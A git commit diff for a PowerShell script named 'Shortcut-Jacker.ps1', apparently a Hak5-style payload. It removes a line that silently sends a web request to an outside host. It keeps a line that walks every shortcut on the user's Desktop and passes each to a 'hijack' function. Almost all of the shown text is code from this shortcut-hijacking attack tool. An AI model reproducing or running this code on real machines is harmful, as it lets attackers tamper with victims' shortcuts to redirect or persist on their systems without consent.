Update Shortcut-Jacker.ps1
This commit is contained in:
parent
7f4899b95e
commit
e81518b64e
1 changed files with 1 additions and 1 deletions
|
@ -114,5 +114,5 @@ if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconL
|
||||||
}
|
}
|
||||||
|
|
||||||
#-----------------------------------------------------------------------------------------------------------
|
#-----------------------------------------------------------------------------------------------------------
|
||||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
|
||||||
Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}
|
Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}
|
||||||
|
|
Loading…
Reference in a new issue